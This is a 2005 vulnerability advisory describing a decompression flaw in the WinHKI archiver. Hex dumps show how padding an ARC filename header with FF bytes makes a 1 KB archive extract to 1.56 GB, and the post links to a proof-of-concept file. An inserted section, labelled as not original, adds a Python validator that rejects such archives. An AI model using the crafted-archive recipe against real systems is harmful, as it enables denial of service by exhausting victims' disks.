[Full-Disclosure] WinHKI - ARC File Extraction of 1KB to 1.56GB

From: Rafel Ivgi, The-Insider (theinsider_at_012.net.il)
Date: 01/07/05

    Date: Fri, 07 Jan 2005 01:17:03 +0200
    To: bugtraq@securityfocus.com, full-disclosure@lists.netsys.com, Windows NTBugtraq Mailing List <NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM>, vulnwatch@vulnwatch.org, news@securiteam.com, "securitytracker.com" <bugs@securitytracker.com>
    
    

    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

    Application: WinHKI
    Vendors: http://www.webtoolmaster.com
    Versions: 1.4d
    Platforms: Windows
    Bug: ARC File Extraction of 1KB to 1.56GB
    Exploitation: Local (extract file)
    Date: 24 Dec 2004
    Author: Rafel Ivgi, The-Insider
    E-Mail: the_insider@mail.com
    Website: http://theinsider.deep-ice.com

    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

    1) Introduction
    2) Bug
    3) The Code

    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

    ===============
    1) Introduction
    ===============

    WinHKI is a file archiver which supports the ARC, BH, CAB, HKI, JAR, LHA, TAR
    and GZ compression formats.

    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

    ======
    2) Bug
    ======

    This is a normal CAB compressed file header

    00000000 1A02 3235 312E 4854 4D00 5E5E 5E5E 5E1B ..251.HTM.^^^^^.
    00000010 0000 0078 3139 73B5 121B 0000 003C 7363 ...x19s......<sc
    00000020 7269 7074 FB3E 616C 6572 7428 293C 2F73 ript.>alert()</s
    00000030 6372 6970 743E 0D0A 1A00 cript>....

    By adding a certain number of characters after the filename header and
    replacing all nulls (00) with FF (so that our long string is not
    terminated), we get the following:

    00000000 1A02 3235 312E 4854 4DFF 5E5E 5E5E 5EFF ..251.HTM.^^^^^.
    00000010 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF ................
    00000020 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF ................
    00000030 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF ................
    00000040 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF ................
    00000050 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF ................
    00000060 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF ................
    00000070 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF ................
    00000080 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF ................
    00000090 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF ................
    000000A0 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF ................
    000000B0 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF ................
    000000C0 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF ................
    000000D0 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF ................
    000000E0 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF ................
    000000F0 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF ................
    00000100 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF ................
    00000110 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF ................
    00000120 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF ................
    00000130 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF ................
    00000140 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF ................
    00000150 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF ................
    00000160 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF ................
    00000170 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF ................
    00000180 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF ................
    00000190 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF ................
    000001A0 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF ................
    000001B0 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF ................
    000001C0 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF ................
    000001D0 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF ................
    000001E0 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF ................
    000001F0 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF ................
    00000200 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF ................
    00000210 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF ................
    00000220 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF ................
    00000230 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF ................
    00000240 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF ................
    00000250 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF ................
    00000260 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF ................
    00000270 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF ................
    00000280 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF ................
    00000290 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF ................
    000002A0 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF ................
    000002B0 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF ................
    000002C0 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF ................
    000002D0 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF ................
    000002E0 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF ................
    000002F0 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF ................
    00000300 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF ................
    00000310 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF ................
    00000320 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF ................
    00000330 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF ................
    00000340 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF ................
    00000350 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF ................
    00000360 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF ................
    00000370 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF ................
    00000380 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF ................
    00000390 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF ................
    000003A0 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF ................
    000003B0 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF ................
    000003C0 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF ................
    000003D0 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF ................
    000003E0 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF ................
    000003F0 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF ................
    00000400 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FF1B ................
    00000410 FFFF FF78 3139 73B5 121B FFFF FF3C 7363 ...x19s......<sc
    00000420 7269 7074 FB3E 616C 6572 7428 293C 2F73 ript.>alert()</s
    00000430 6372 6970 743E 0D0A 1A00 cript>....

    WinHKI will create a 1.56 gigabyte file at the selected extraction location.
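    As an added example (not part of the original advisory and not WinHKI's code), the check below shows how an extractor can refuse this kind of archive before it writes a single byte. It assumes the classic ARC entry layout (0x1A marker, method byte, 13-byte NUL-padded filename, 32-bit compressed size, 16-bit date, time and CRC, 32-bit original size) and walks every entry, rejecting a filename field with no terminator, a compressed size that does not fit in the file, and a declared output size over an assumed policy cap or expansion ratio. The sample archives are constructed here from the two dumps above; the second dump's size fields read as 0xFFFFFF1B once the nulls become FF, and the benign entry from the first dump parses cleanly. MAX_OUTPUT_BYTES and MAX_RATIO are assumed policy values, not anything WinHKI implements.

```python
"""Pre-extraction sanity checks for ARC archives (added example).

Assumed ARC entry layout: 0x1A marker, method byte (0 = end of archive),
13-byte NUL-padded name, u32 compressed size, u16 date, u16 time, u16 CRC,
u32 original size (absent when method == 1). Little-endian throughout.
"""
import struct
from dataclasses import dataclass

MAX_OUTPUT_BYTES = 256 * 1024 * 1024  # assumed policy: refuse larger declared outputs
MAX_RATIO = 1000                      # assumed policy: refuse expansion beyond 1000:1


class ArcError(ValueError):
    """Raised when the header structure itself does not hold together."""


@dataclass
class ArcEntry:
    name: str
    method: int
    compressed_size: int
    original_size: int
    data_offset: int


def parse_arc(blob: bytes) -> list[ArcEntry]:
    """Walk the archive headers without extracting anything."""
    entries, pos = [], 0
    while True:
        if pos + 2 > len(blob):
            raise ArcError("truncated: no end-of-archive marker")
        marker, method = blob[pos], blob[pos + 1]
        if marker != 0x1A:
            raise ArcError(f"bad header marker 0x{marker:02X} at offset {pos}")
        if method == 0:
            return entries  # 1A 00 terminates the archive
        pos += 2
        name_field = blob[pos:pos + 13]
        if len(name_field) < 13:
            raise ArcError("truncated filename field")
        nul = name_field.find(b"\x00")
        if nul < 0:  # the modified dump above: every 00 replaced by FF
            raise ArcError(f"filename field at offset {pos} has no NUL terminator")
        name = name_field[:nul].decode("ascii", "replace")
        pos += 13
        fmt = "<IHHH" if method == 1 else "<IHHHI"
        if pos + struct.calcsize(fmt) > len(blob):
            raise ArcError("truncated size fields")
        fields = struct.unpack_from(fmt, blob, pos)
        pos += struct.calcsize(fmt)
        comp = fields[0]
        orig = comp if method == 1 else fields[4]
        if comp > len(blob) - pos:
            raise ArcError(f"{name}: compressed size {comp} exceeds the "
                           f"{len(blob) - pos} bytes left in the file")
        entries.append(ArcEntry(name, method, comp, orig, pos))
        pos += comp


def check_archive(blob: bytes) -> list[str]:
    """Return the reasons extraction should be refused; empty list means OK."""
    try:
        entries = parse_arc(blob)
    except ArcError as exc:
        return [f"malformed: {exc}"]
    problems = []
    for e in entries:
        if e.original_size > MAX_OUTPUT_BYTES:
            problems.append(f"{e.name}: declared output {e.original_size} bytes "
                            f"exceeds cap {MAX_OUTPUT_BYTES}")
        elif e.compressed_size and e.original_size > e.compressed_size * MAX_RATIO:
            problems.append(f"{e.name}: expansion ratio above {MAX_RATIO}:1")
        if e.method == 2 and e.original_size != e.compressed_size:
            problems.append(f"{e.name}: stored entry with mismatched sizes")
    return problems


def _entry(name_field: bytes, comp: int, orig: int, payload: bytes, pad: bytes = b"") -> bytes:
    """Build a one-entry archive; date/time/CRC values copied from the dump above."""
    return (b"\x1a\x02" + name_field + pad
            + struct.pack("<IHHHI", comp, 0x3178, 0x7339, 0x12B5, orig)
            + payload + b"\x1a\x00")


# Constructed samples, transcribed from the two hex dumps in the advisory.
PAYLOAD = b"<script\xfb>alert()</script>\r\n"          # 27 bytes of stored data
BENIGN = _entry(b"251.HTM\x00^^^^^", 27, 27, PAYLOAD)   # first dump
UNTERMINATED = _entry(b"251.HTM\xff^^^^^", 0xFFFFFF1B, 0xFFFFFF1B,
                      PAYLOAD, pad=b"\xff" * 1024)      # second dump
# Constructed variant: well-formed name, but the original-size field claims ~4 GB.
OVERSIZED = _entry(b"251.HTM\x00^^^^^", 27, 0xFFFFFF1B, PAYLOAD)

if __name__ == "__main__":
    for label, blob in (("benign", BENIGN), ("unterminated", UNTERMINATED),
                        ("oversized", OVERSIZED)):
        print(label, len(blob), "bytes ->", check_archive(blob) or "ok")
```

    The two structural checks (terminated name, compressed size within the file) reject the modified dump outright; the policy checks catch the quieter case where the header is well-formed but the declared output is wildly out of proportion to a 1 KB archive. Either way the decision is made before any output file is opened.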

    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

    ===========
    3) The Code
    ===========

    An online proof of concept can be found at:
    http://theinsider.deep-ice.com/hki156gb.ARC

    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

    ---
    Rafel Ivgi, The-Insider
    http://theinsider.deep-ice.com
    "Scripts and Codes will make me D.O.S , but they will never HACK me."
    _______________________________________________
    Full-Disclosure - We believe in it.
    Charter: http://lists.netsys.com/full-disclosure-charter.html
    